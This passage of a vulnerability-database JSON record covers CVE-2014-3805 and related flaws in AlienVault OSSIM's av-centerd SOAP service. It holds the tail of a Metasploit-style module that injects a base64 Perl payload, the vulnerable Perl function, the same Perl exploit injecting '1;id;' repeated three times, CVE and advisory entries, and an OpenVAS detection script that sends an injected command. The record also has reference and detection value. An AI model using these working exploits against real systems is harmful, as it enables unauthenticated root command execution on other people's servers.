\"(\\\"#{Rex::Text.encode_base64(payload.encoded)}\\\"))\"\r\n args[5].text = \"1;perl -MMIME::Base64 -e '#{perl_payload}';\"\r\n \r\n xml.to_s\r\n end\r\n \r\n def send_soap_request(method, timeout=20)\r\n soap = build_soap_request(method)\r\n \r\n res = send_request_cgi({\r\n 'uri' => '/av-centerd',\r\n 'method' => 'POST',\r\n 'ctype' => 'text/xml; charset=UTF-8',\r\n 'data' => soap,\r\n 'headers' => {\r\n 'SOAPAction' => \"\\\"AV/CC/Util##{method}\\\"\"\r\n }\r\n }, timeout)\r\n \r\n res\r\n end\r\n \r\n def 
exploit\r\n send_soap_request(\"get_log_line\", 1)\r\n end\r\nend\r\n__END__\r\n \r\n/usr/share/alienvault-center/lib/AV/CC/Util.pm\r\n \r\nsub get_log_line {\r\n my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $r_file, $number_lines )\r\n = @_;\r\n \r\n verbose_log_file(\r\n \"GET LOG LINE : Received call from $uuid : ip source = $admin_ip, hostname = $hostname :($funcion_llamada,$r_file)\"\r\n );\r\n \r\n my @ret = (\"$systemuuid\");\r\n \r\n if ( $r_file =~ /\\.\\./ ){\r\n push(@ret,\"File not auth\");\r\n return \\@ret;\r\n }\r\n \r\n if ( $number_lines <= 0) {\r\n push(@ret,\"Error in number lines\");\r\n return \\@ret;\r\n }\r\n \r\n if (( $r_file =~ /^\\/var\\/log\\// ) or ( $r_file =~ /^\\/var\\/ossec\\/alerts\\// ) or ( $r_file =~ /^\\/var\\/ossec\\/logs\\// )){\r\n if (! -f \"$r_file\" ){\r\n push(@ret,\"File not found\");\r\n return \\@ret;\r\n }\r\n push(@ret,\"ready\");\r\n \r\n my $command = \"tail -$number_lines $r_file\";\r\n #push(@ret,\"$command\");\r\n #my @content = `tail -$number_lines $r_file`;\r\n my @content = `$command`;\r\n push(@ret,@content);\r\n return \\@ret;\r\n }\r\n else {\r\n push(@ret,\"path not auth\");\r\n return \\@ret;\r\n }\r\n}\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/28537", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T16:40:46", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "AlienVault OSSIM < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-3805"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86990", "id": "SSV:86990", "sourceData": "\n # Exploit Title: AlienVault OSSIM < 4.7.0 av-centerd 'get_log_line()' Remote Code Execution\r\n# Date: 06/17/2014\r\n# Exploit Author: Alfredo Ramirez\r\n# Vendor 
Homepage: http://www.alienvault.com/\r\n# Software Link: http://www.alienvault.com/open-threat-exchange/projects\r\n# Version: < 4.7.0\r\n# Tested on: Debian/Virtual Appliance\r\n# CVE : CVE-2014-3805\r\n\r\n #!perl -w\r\n\r\n use SOAP::Lite;\r\n\r\n # SSL is self-signed so we have to ignore verification.\r\n $ENV{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;\r\n\r\n # We simply append the 'id' command to the number of log we want to\r\n # read.\r\n @soap_response = SOAP::Lite\r\n -> uri('AV/CC/Util')\r\n -> proxy('https://172.26.22.2:40007/av-centerd')\r\n -> get_log_line('All', '423d7bea-cfbc-f7ea-fe52-272ff7ede3d2' ,'172.26.22.1', 'test', '/var/log/auth.log', '1;id;')\r\n -> result;\r\n\r\n for (@{ $soap_response[0] }) {\r\n print "$_\\n";\r\n }\r\n\r\n # If vulnerable output will be: uid=0(root) gid=0(root) groups=0(root)\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-86990", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:02", "description": "\nAlienvault Open Source SIEM (OSSIM) 4.7.0 - av-centerd get_log_line() Remote Code Execution", "edition": 2, "cvss3": {}, "published": "2014-06-18T00:00:00", "title": "Alienvault Open Source SIEM (OSSIM) 4.7.0 - av-centerd get_log_line() Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3805"], "modified": "2014-06-18T00:00:00", "id": "EXPLOITPACK:F65030A33A46E083528FF901D4F0FE37", "href": "", 
"sourceData": "# Exploit Title: AlienVault OSSIM < 4.7.0 av-centerd 'get_log_line()' Remote Code Execution\n# Date: 06/17/2014\n# Exploit Author: Alfredo Ramirez\n# Vendor Homepage: http://www.alienvault.com/\n# Software Link: http://www.alienvault.com/open-threat-exchange/projects\n# Version: < 4.7.0\n# Tested on: Debian/Virtual Appliance\n# CVE : CVE-2014-3805\n\n #!perl -w\n\n use SOAP::Lite;\n\n # SSL is self-signed so we have to ignore verification.\n $ENV{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;\n\n # We simply append the 'id' command to the number of log we want to\n # read.\n @soap_response = SOAP::Lite\n -> uri('AV/CC/Util')\n -> proxy('https://172.26.22.2:40007/av-centerd')\n -> get_log_line('All', '423d7bea-cfbc-f7ea-fe52-272ff7ede3d2' ,'172.26.22.1', 'test', '/var/log/auth.log', '1;id;')\n -> result;\n\n for (@{ $soap_response[0] }) {\n print \"$_\\n\";\n }\n\n # If vulnerable output will be: uid=0(root) gid=0(root) groups=0(root)", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-05-26T09:02:13", "description": "An arbitrary command execution vulnerability exists in AlienVault OSSIM. The vulnerability is due to a failure to safely sanitize user data while handling SOAP service requests via the get_license function of Util.pm. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to the affected service. 
Successful exploitation could result in arbitrary command execution with root privileges.", "cvss3": {}, "published": "2014-08-03T00:00:00", "type": "checkpoint_advisories", "title": "AlienVault OSSIM av-centerd Util.pm get_license Arbitrary Command Execution (CVE-2014-3805)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-3805"], "modified": "2014-07-29T00:00:00", "id": "CPAI-2014-1722", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2022-05-04T17:44:14", "description": "", "cvss3": {}, "published": "2014-06-18T00:00:00", "type": "exploitdb", "title": "Alienvault Open Source SIEM (OSSIM) < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2014-3805", "CVE-2014-3805"], "modified": "2014-06-18T00:00:00", "id": "EDB-ID:33805", "href": "https://www.exploit-db.com/exploits/33805", "sourceData": "# Exploit Title: AlienVault OSSIM < 4.7.0 av-centerd 'get_log_line()' Remote Code Execution\r\n# Date: 06/17/2014\r\n# Exploit Author: Alfredo Ramirez\r\n# Vendor Homepage: http://www.alienvault.com/\r\n# Software Link: http://www.alienvault.com/open-threat-exchange/projects\r\n# Version: < 4.7.0\r\n# Tested on: Debian/Virtual Appliance\r\n# CVE : CVE-2014-3805\r\n\r\n #!perl -w\r\n\r\n use SOAP::Lite;\r\n\r\n # SSL is self-signed so we have to ignore verification.\r\n $ENV{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;\r\n\r\n # We simply append the 'id' command to the number of log we want to\r\n # read.\r\n 
@soap_response = SOAP::Lite\r\n -> uri('AV/CC/Util')\r\n -> proxy('https://172.26.22.2:40007/av-centerd')\r\n -> get_log_line('All', '423d7bea-cfbc-f7ea-fe52-272ff7ede3d2' ,'172.26.22.1', 'test', '/var/log/auth.log', '1;id;')\r\n -> result;\r\n\r\n for (@{ $soap_response[0] }) {\r\n print \"$_\\n\";\r\n }\r\n\r\n # If vulnerable output will be: uid=0(root) gid=0(root) groups=0(root)", "sourceHref": "https://www.exploit-db.com/download/33805", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T13:01:27", "description": "The av-centerd SOAP service in AlienVault OSSIM before 4.7.0 allows remote attackers to execute arbitrary commands via a crafted (1) update_system_info_debian_package, (2) ossec_task, (3) set_ossim_setup admin_ip, (4) sync_rserver, or (5) set_ossim_setup framework_ip request, a different vulnerability than CVE-2014-3805.", "cvss3": {}, "published": "2014-06-13T14:55:00", "type": "cve", "title": "CVE-2014-3804", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3804", "CVE-2014-3805"], "modified": "2017-09-16T01:29:00", "cpe": ["cpe:/a:alienvault:open_source_security_information_management:4.0.3", "cpe:/a:alienvault:open_source_security_information_management:4.5", "cpe:/a:alienvault:open_source_security_information_management:4.1.2", "cpe:/a:alienvault:open_source_security_information_management:4.6.1", "cpe:/a:alienvault:open_source_security_information_management:4.2", 
"cpe:/a:alienvault:open_source_security_information_management:4.6", "cpe:/a:alienvault:open_source_security_information_management:4.1", "cpe:/a:alienvault:open_source_security_information_management:4.0", "cpe:/a:alienvault:open_source_security_information_management:4.3.2", "cpe:/a:alienvault:open_source_security_information_management:4.0.4", "cpe:/a:alienvault:open_source_security_information_management:4.1.3", "cpe:/a:alienvault:open_source_security_information_management:4.2.3", "cpe:/a:alienvault:open_source_security_information_management:4.3.3", "cpe:/a:alienvault:open_source_security_information_management:4.3", "cpe:/a:alienvault:open_source_security_information_management:4.4", "cpe:/a:alienvault:open_source_security_information_management:4.3.1", "cpe:/a:alienvault:open_source_security_information_management:4.2.2"], "id": "CVE-2014-3804", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3804", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:alienvault:open_source_security_information_management:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.4:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:alienvault:open_source_security_information_management:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:01:30", "description": "The av-centerd SOAP service in AlienVault OSSIM before 4.7.0 allows remote attackers to execute arbitrary commands via a crafted (1) get_license, (2) get_log_line, or (3) update_system/upgrade_pro_web request, a different vulnerability than CVE-2014-3804.", "cvss3": {}, "published": "2014-06-13T14:55:00", "type": "cve", "title": "CVE-2014-3805", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3804", "CVE-2014-3805"], "modified": "2017-09-16T01:29:00", "cpe": ["cpe:/a:alienvault:open_source_security_information_management:4.0.3", "cpe:/a:alienvault:open_source_security_information_management:4.5", "cpe:/a:alienvault:open_source_security_information_management:4.1.2", "cpe:/a:alienvault:open_source_security_information_management:4.6.1", "cpe:/a:alienvault:open_source_security_information_management:4.2", "cpe:/a:alienvault:open_source_security_information_management:4.6", 
"cpe:/a:alienvault:open_source_security_information_management:4.1", "cpe:/a:alienvault:open_source_security_information_management:4.0", "cpe:/a:alienvault:open_source_security_information_management:4.4", "cpe:/a:alienvault:open_source_security_information_management:4.3.2", "cpe:/a:alienvault:open_source_security_information_management:4.1.3", "cpe:/a:alienvault:open_source_security_information_management:4.0.4", "cpe:/a:alienvault:open_source_security_information_management:4.2.3", "cpe:/a:alienvault:open_source_security_information_management:4.3.3", "cpe:/a:alienvault:open_source_security_information_management:4.3", "cpe:/a:alienvault:open_source_security_information_management:4.3.1", "cpe:/a:alienvault:open_source_security_information_management:4.2.2"], "id": "CVE-2014-3805", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3805", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:alienvault:open_source_security_information_management:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.4:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.6:*:*:*:*:*:*:*", 
"cpe:2.3:a:alienvault:open_source_security_information_management:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:37:41", "description": "The av-centerd SOAP service in AlienVault OSSIM before 4.7.0 allows remote attackers to execute arbitrary commands via a crafted (1) remote_task or (2) get_license request, a different vulnerability than CVE-2014-3804 and CVE-2014-3805.", "cvss3": {}, "published": "2014-08-21T14:55:00", "type": "cve", "title": "CVE-2014-5210", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3804", "CVE-2014-3805", "CVE-2014-5210"], "modified": "2014-08-21T16:57:00", "cpe": ["cpe:/a:alienvault:open_source_security_information_management:4.5", "cpe:/a:alienvault:open_source_security_information_management:4.1.2", "cpe:/a:alienvault:open_source_security_information_management:2.1.5-1", "cpe:/a:alienvault:open_source_security_information_management:4.3.3", "cpe:/a:alienvault:open_source_security_information_management:3.1.12", "cpe:/a:alienvault:open_source_security_information_management:3.1", "cpe:/a:alienvault:open_source_security_information_management:2.1.5", 
"cpe:/a:alienvault:open_source_security_information_management:4.6", "cpe:/a:alienvault:open_source_security_information_management:4.1.3", "cpe:/a:alienvault:open_source_security_information_management:2.1.5-2", "cpe:/a:alienvault:open_source_security_information_management:2.1.5-3", "cpe:/a:alienvault:open_source_security_information_management:4.4", "cpe:/a:alienvault:open_source_security_information_management:4.6.1", "cpe:/a:alienvault:open_source_security_information_management:4.2", "cpe:/a:alienvault:open_source_security_information_management:4.0.4", "cpe:/a:alienvault:open_source_security_information_management:2.1.2", "cpe:/a:alienvault:open_source_security_information_management:1.0.6", "cpe:/a:alienvault:open_source_security_information_management:4.3", "cpe:/a:alienvault:open_source_security_information_management:4.2.2", "cpe:/a:alienvault:open_source_security_information_management:4.0.3", "cpe:/a:alienvault:open_source_security_information_management:4.1", "cpe:/a:alienvault:open_source_security_information_management:4.0", "cpe:/a:alienvault:open_source_security_information_management:4.3.2", "cpe:/a:alienvault:open_source_security_information_management:3.1.9", "cpe:/a:alienvault:open_source_security_information_management:2.1", "cpe:/a:alienvault:open_source_security_information_management:4.2.3", "cpe:/a:alienvault:open_source_security_information_management:3.1.10", "cpe:/a:alienvault:open_source_security_information_management:1.0.4", "cpe:/a:alienvault:open_source_security_information_management:4.3.1"], "id": "CVE-2014-5210", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5210", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:alienvault:open_source_security_information_management:4.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:alienvault:open_source_security_information_management:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:3.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:2.1.5-1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.4:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:2.1.5-2:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:2.1.5-3:*:*:*:*:*:*:*", 
"cpe:2.3:a:alienvault:open_source_security_information_management:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:alienvault:open_source_security_information_management:4.1.2:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:37:11", "description": "AlienVault OSSIM is prone to multiple remote code execution\n vulnerabilities", "cvss3": {}, "published": "2014-06-20T00:00:00", "type": "openvas", "title": "AlienVault OSSIM Multiple Remote Code Execution Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-3804", "CVE-2014-3805"], "modified": "2019-02-14T00:00:00", "id": "OPENVAS:1361412562310105048", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105048", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ossim_67999.nasl 13659 2019-02-14 08:34:21Z cfischer $\n#\n# AlienVault OSSIM Multiple Unspecified Remote Code Execution Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:alienvault:open_source_security_information_management\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105048\");\n script_bugtraq_id(67999, 67998);\n script_cve_id(\"CVE-2014-3804\", \"CVE-2014-3805\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 13659 $\");\n\n script_name(\"AlienVault OSSIM Multiple Remote Code Execution Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/67999\");\n script_xref(name:\"URL\", value:\"http://www.alienvault.com/\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-14 09:34:21 +0100 (Thu, 14 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-20 12:08:51 +0200 (Fri, 20 Jun 2014)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_ossim_web_detect.nasl\");\n script_require_ports(\"Services/www\", 40007);\n script_mandatory_keys(\"OSSIM/installed\");\n\n script_tag(name:\"impact\", value:\"An attacker can leverage these issues to execute arbitrary code with\n root privileges.\");\n script_tag(name:\"vuldetect\", value:\"Send a special crafted HTTP SOAP request and check the response.\");\n script_tag(name:\"insight\", value:\"The application fails to sufficiently sanitize user-supplied\n input.\");\n script_tag(name:\"solution\", value:\"Updates are available.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 
script_tag(name:\"summary\", value:\"AlienVault OSSIM is prone to multiple remote code execution\n vulnerabilities\");\n script_tag(name:\"affected\", value:\"AlienVault OSSIM 4.6.1 and prior are vulnerable.\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! wport = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:wport ) ) exit( 0 );\n\nport = 40007;\nif( ! get_port_state( port ) ) exit( 0 );\n\nuseragent = http_get_user_agent();\ncmd = 'id';\nhost = http_host_name(port:port);\n\nsoap = \"<soap:Envelope soap:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/' xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/' \" +\n \"xmlns:soapenc='http://schemas.xmlsoap.org/soap/encoding/' xmlns:xsd='http://www.w3.org/2001/XMLSchema' xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>\" +\n \"<soap:Body><update_system_info_debian_package xmlns='AV/CC/Util'><c-gensym3 xsi:type='xsd:string'>OpenVAS</c-gensym3><c-gensym5 xsi:type='xsd:string'>OpenVAS</c-gensym5>\" +\n \"<c-gensym7 xsi:type='xsd:string'>OpenVAS</c-gensym7><c-gensym9 xsi:type='xsd:string'>OpenVAS</c-gensym9><c-gensym11 xsi:type='xsd:string'>;\" +\n cmd +\n \"</c-gensym11></update_system_info_debian_package></soap:Body></soap:Envelope>\";\n\nlen = strlen( soap );\n\nreq = 'POST /av-centerd HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent + '\\r\\n' +\n 'SOAPAction: \"AV/CC/Util#update_system_info_debian_package\"\\r\\n' +\n 'Content-Type: text/xml; charset=UTF-8\\r\\n' +\n 'Content-Length: ' + len + '\\r\\n' +\n '\\r\\n' +\n soap;\nbuf = http_send_recv(port:port, data:req, bodyonly:FALSE);\n\nif( buf =~ \"uid=[0-9]+.*gid=[0-9]+\" )\n{\n req_resp = 'Request:\\n' + req + '\\n\\nResponse:\\n' + buf;\n security_message( port:port, expert_info:req_resp );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}